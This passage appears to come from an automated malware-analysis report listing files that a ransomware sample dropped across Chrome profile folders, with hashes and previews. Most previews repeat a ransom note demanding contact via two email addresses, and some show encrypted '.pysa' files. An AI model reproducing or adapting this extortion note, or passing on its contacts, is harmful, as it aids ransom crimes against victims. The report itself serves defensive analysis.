                  SSDEEP:1536:LosQb8TB26uCjy9A2/LoyohIaLRVIpHXcghy8UtZAkMqrriqW2G34:kYs6XS0NhJRVeHXcsy/AkZrlW2GI
                  MD5:9E58D86EA66B8A27E031E37BBBC7DCAA
                  SHA1:C4F148DE305E5F524BBE1B8265AB3D9C95882669
                  SHA-256:B1E307F8645523F85CDBA78028ED74417822AB40CBA2297F88A42E41115C6C63
                  SHA-512:C25B43F44DB35055FF3716F813102E8951E29755919DADD99E207CBDFBB3DC9748A5D4CD1F3A6400AB39EBF928BEC8D78E58E405BE20B696DA0945F9CAD68A91
                  Malicious:true
                  Preview: ~s.s.;....u_uV..l..O...y...h.+B.31G....5X.h...o......g ..ep..!.4...[.90{.R......\.F.3.....Lu.m...kXw.s4.-...z...)..N........%".....z].0=..`.L.}a.g...up.Z/.+..Sr.B2<M.Pb............6X......A......[....^.g.c...C...,Nr.....d.....?..G...,...f.?{:yf.YI2Z.wu..Jx...0....,..O.6%Xjw.......n..E^.c@...D|...i.;.K.2.*.....b...|.}~.)#...).....p...mh.. .k........=f.C..B-.N`.x..6..C*...s.*`.`..n.2...2...R9R..d...I~gE..u2j.;........>.2.M2K.....6..*.....@g..I;.&..3..8..".\..<-...n.U0.s.{e.1.%Tu......D...`..5...y1p.nk.R8. ..=...U....3t..........r..p.=.....?&.b.Y~.7g..2.f.An..}.Sp...eY?m.._....*e.L.......-...#.X...N......=.a_:2\;pA.........N.>d.9I..... G}....z1.+....*....9/$..=#c.............0.d...j.....&f`........E`Q}H.l..s9..:\..g.4.H.1i...Q..zh...+..f..)..~A..*...+Ne...iF.G.w{zH.1dUa..66B.o.v..0E.0..J.....d@)Y.+.M../.e.?.'..RGu.~.....3%....o..p.%.Hz.Yb..7.<=.5....x{t>.....X+.../d......'V..y...)X.............m...../8(..f]...(..~.A..;2. ..hU..w...a.#2V.ZZ......%...
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.673764924833565
                  Encrypted:false
                  SSDEEP:192:NZop/ErcnfCxjIDsrz0T3734kfciY4RG72XUbQD6lWCtn:Lop/Ercnqx0DsrgTL/fc4NXZ2
                  MD5:EEF02F965F31A1C660AE9962D14D0C4F
                  SHA1:B561FD9376AC83841C2AA11208D613C49D0D7695
                  SHA-256:3472B18CF5E16608487E1081FE57F5452F137C9D7795BB574D7ABF637C2580C0
                  SHA-512:845D184AED83D5B0404632B9A3553218DA7EED1942EC816BB2D5ABB0B3BA56B4E26E91E528EAEDC824DD67CB96DD72B7475312B5AF4D8B1C9C4A0CEED1BB691B
                  Malicious:false
                  Preview: .G....q.<.."I.....l.hE..K..U)>!.<RZh.-).....?..P...u....t......G@.TR.>t{'.T;~.....4^J.r..E-...m..t........h!......G..'..C ..#Q.e.6.....C.G...$....>/.-..;.+..D...w...9.8E...{j.5....|.G....(.k..[M.oq./(..@~.].4.V.X.v`....,.......}{...c.._w............Q..$.q.m.Lf..0.6k..._0.g...Ue..|8\.uN.z{I..&6n:...14<s.t..?..=.&=.........^3...C^.iL.......t.`.t5..X.K.`.c.W.6....~.:..~J.....}.hz:.X"....RX.*...NGt.$..E%...h....^........./.|.BW.......~t.....ITj[.k.gvA/.N...'........@....RW..........BN....=.1.k&....v.`..v..K..t.92..*..K;.(...@J.cI.H.~......b.N5...q.e...R.W?."..I.d.......G..7i[..z.uBt.y...:./V..2^.u"1...;./..z^2._.;..Jr...q.....M.1e..q..5.p.h..e..\....C.W!..k.'..m.NYX...u...v..;..q...VD./g.lj....vV.....g../z....`.....:..N.)iR^..0..X...DJ....3...;y.6......K......c(O..AM...x.7.4.X....*....x......l9....|!'....*F.s%3z.Z..b].-*\..D......\.....e.Ih.=}.|@/8.cB.`J.?O......H.o@.A..E........[P.|hS....C.../..?.....W.Uz.....Vs.BP..6&.&.......)..*)
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998208482943179
                  Encrypted:true
                  SSDEEP:6144:LyCk/qSKeroihO3Pt9gHNYXMubMyMD4905IpuRCNv8lyw9mq:GCExKH3DAiXGf8GIpQ8q
                  MD5:7AD76873E62D36B78422AB39A36F6C8A
                  SHA1:FD11901301686D7F41FFDFB67F6990C70796B352
                  SHA-256:F77373CB00C8C6A466A364329B88EA2FEE8D7314024C6C74AAC8643D670BF222
                  SHA-512:D32B364F3EE3E2F926B947277F3248E721A07A4CF5DBE297D348EA2E2779A57D1FAA1AF8E82B8609001D61657BEFD612A44BD433D1B4498739CD099C0341D3B8
                  Malicious:true
                  Preview: .......`..7/u!..w......,...*~......$..]E..U....{..1a.!..(..H.....:X..<...=.v...5F.!...&.2Te..._.oO.Z..bo<a].....3...Mq.|.#9.......g`.>....*..G..D..A.u...'....>.....J...8E..{...k<m..(8.>.+.q.]...4..w..s...u.I...k.xB5...+."!3<)....UU.........w.....tA.*w=...0t..]..r....=,.@.8...}_...pY....2m3.u(.$:.Y.......|.^.e?(.6.....h.TH.,".......0.:.2ZO.).f..r....x:Ky...8...T.Q.,..(.6Q...z...&.u.@Vx:....dC...5.....v..-U0.`zA.h..i........../z...;:....B.!.7...w........!k...K.......C..^.l...wD..U.n=.9..1Cv.......'...n.0z..)n..l...c..-..7.".X.j.8.7.@i.[di...(^v.R.&X\..2u.....hu....G...-.`=..k..f..M.N/.wK.....V.V..Z....2....).!.,.L...$2....:3DbJ.b O.......vf...:.....b......L9..nIu.."..+..~0'/..H..~...w...<6....k"br.D..\Q..W...C.....(j.o...'y...v..af.]2w.q..l..*8?....3..+.c.7\.S..&..g...|.{>..J...F..U....f.?&..]..`.G..T.7J%.V.....~...q..........#.9..Z.-.9.FN...........n8.n.`.7.;..;..Ov.2Q.Y!g.V..%..n'...<X@.W.2HsK..S.2).<u.....^...(WJ...@...;...>M.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.671144087072672
                  Encrypted:false
                  SSDEEP:192:b80JPbNZJdIe2VTQUUCUbc05KOYraypWhKDX1CKd2ISsvOThoM1XmOFZ5khbM4J:b8CP9dITQ/yraypHjFd2IS/KM1HFZuMI
                  MD5:4AB791495066F5D3DE4ADA95897068CC
                  SHA1:BC70D095F415224F4EBF8739CD856BBD7F557671
                  SHA-256:303982EEBB8CC8FD81AD4DF9D901B1C48385533126D34FA44BC75BC67951308F
                  SHA-512:4A35F942219D1AAE3EAB0447748DDD838D0D945B3A420F7D483F56ED8D4D7D0638A32DDE100D00F80D581F2559558AA2BF73CFF1985A158CB1623B0702C212EC
                  Malicious:false
                  Preview: ..N...i..*y(:Lz..rD.OO7..I:....6z..r.......kBc.1t3.ch.pzn..ykL......].v...f..;...7..rO...2i...,2..&..<.t..5...c5.y!h.o...........V._.n.L..h...N...D&x.:GM..w!.9._..t.(T?..........{L....Z.L.HZ..P...ZD.j.)..<.K.a....E.. .[tq.4..[.:r\..8*.......X[@e=......LS.=U"f....bv.......a.."....r.:...Kn..hp.4...I....O............=..>ec.4..&.Ik......O.%._.h..a.W..G..6..7D..PWb<.P..H.%.x..j...&....,.w...p...t.......F.O..|o.N.....PF.7.$..M..>OZ.x/\h.}c7.E.. (tg..M.h.G...n.I....y...1..]...cT.n.M...p..B....*.?.....:....s...O......\.g4Z..n15%..|J.....wt"_v<..k......%..om._...r...7!..OMD.k....:...-U.....2.{$.o..Nu..W}...J...]..E..%..zwf.."...!Lw....U......!...{F....q!Z....)H....*...gW....).[<..o.T....b...........%.H...:2c....n1.2...d]oH..[jb4U...a.s.<C...`S.8..,.....c......}..o.,.]...!..~.3../L.._49.g...H)....t79..H.......y.U...&..dY.$,..)..Ln..OP.j.7e....y..O.y....mg.F..E...HO.?..&OWo8..|(.2u.^(.{QQa?B.....Om..lu.\C...YV.)0...>&.U......>um;.9.n.Y...|.p/R.O..Dy
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.678142537217261
                  Encrypted:false
                  SSDEEP:192:2L/X6lWJ6DRubzdojjd8j1St5yEM9B91sbIASR9YyT+qp18:2L/ZURJdQ1St5s0SXYo18
                  MD5:7D919548D86683D9AD09B5064AB5C201
                  SHA1:52C8C0441BEA062153F351A40E5492426FABD2FA
                  SHA-256:0B6642FEB657E22477AA1AED044D83971D2998F346A4CE9B4EDB9ACF89D1A47C
                  SHA-512:0EFFFC9AD2E602B05D205D3E3F8A110FEDCAAB2370DD5A48AFB1A94DD83995A78522DE70F0377784E220AA3B736D148B386D54B7BD999A9F279655FF7B894477
                  Malicious:false
                  Preview: ......{.j's.....<B..>9hWCF.h..N.o8.?f..2b9.#d......R...r.E..;.s....@....3;...........%...?...M..T2.f....m.A.6A..I....b84p..7.4,.s.....Q.U...r..~..O2D>y.H5.A.&....-.X...6..t....Y......&.?.......V%..0.....$./L%......n.....Vl.@;.-..b.86..[.L.[O.l..G.mc...u....E..!.#k./.d#..lg.r.l..M{...0.<......d.....en.x?...5(x.k.n.......E....$..h.k...Gz^....Mp............g.0..Kx...c?.....c.jz.fE{.k@.0.._cu.ZW.-. S..x~.ITm.......e....?O..^.W.....6E.........U...@.3..H.d:..3.o.T....`.A^#...|.u.l..>.h.xa.1Iy>....Ify......>........?..=.,Fz.<..g.8...t...p..A.u..H...,:.4.=........@.B...q...x.+*.c....\.dQt...h.]].@eEl...wr..P.YO.........'.O.)KO...y[..t....%T...'.,a..'.}._fI:'.s.^.C.E...~.a.!......]..9G...WnU..;q........|.S sX.A.r......$p.\.*../....LS...0".;O.....Y`......d..C..c..Vp..NBx.....#K...`.B..c%.....5ia....I.=@e..}.\..sA...[.#..`...v..J.n .85....>hK06.%.Q..Z.r.......Sd.}.1..7...$.EO...,.3..m..H.c.7.rd.\'..C$..}.AwUD.l....sW.n..j..C.;...^.v...?.Zx.E(P..].W.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.997966188264708
                  Encrypted:true
                  SSDEEP:3072:Wgpx2Gsa6gePAcUncXlr37AFof0WghPkmQS/sBbMbWXswELLk8DXDBGbb:Jxoa6gWUG37wof0YSEBbMWsw2o8IH
                  MD5:80FE1A253BCEA51064A0565FBB481127
                  SHA1:CFE248A6947C16A4DC79803D62627F2A2C02EC1A
                  SHA-256:3C97129490BA896901A923809AA046C5428516F974BEF0AF1F3550DDC1FB1AC1
                  SHA-512:701556BF465B8D366F241CE4122B602E205A7CEFDF708FE567B07AE3C9963D52E25D1F33EC492E68297B0134BA322C2A8B911E3ED700D8C71D43DD6569F7169E
                  Malicious:true
                  Preview: 3-..u.....f $..$T.P.9.Q....UJ..t@...,<...i/...Y.&........NKK....4z...Y....1W.g..n.j..}....Y...?..E..I,..!6.l.Tf,.n...+..x@.h....h...>.CFa.....K.Y.;.V.....x..-.S..X.;|..w.....`.....8..,..f.../.9....DS..<.MU....!H.%...@..I...^..Sa@....R;.m..SR...3d.E%.DU....u..D.)r.K+A*33..K....>C.Ne.O...q..Q&..j........j.b...._%'..0N...........O"..s..$.w(+...9#.~.B.8...R&.5.VM!}..pb..Lh.V.b.....y.A..S.....(n.....>B0'^..35.[...D..0.....7...C...6.5.HhN.N%...}.!.G+..).!.d.....RI...G(.b..'#..........(..k.Ka?..cW.d......y-k.z.N.5*..3o^...."u(}1R3^Q.(/....0E.2...G{.*-..e...;[.CA.....s....!W...BB...G-....`y..=.e.r$i...8..5.R..?...M+FB.x.RU.;.$.>....b..........1..*`.....C...ym.`.....-H..5.O.4.yR...@.fxW1./...{'U.M.......=..D.......<.b.^....*.R....z..OR....9.6a.*.....r";.".Ua.....0..W..W!.>..w0.....e.E..$~S.._.....I........].p...iU&.@..At... .?....O.U......M..}Wi..Eb:F..F......\...)......S2.U......k..j..'...J..~x.p._.g?l...G..Y5e.J.....g@..a............
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\SwReporter\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\WidevineCdm\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\CrashReports\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
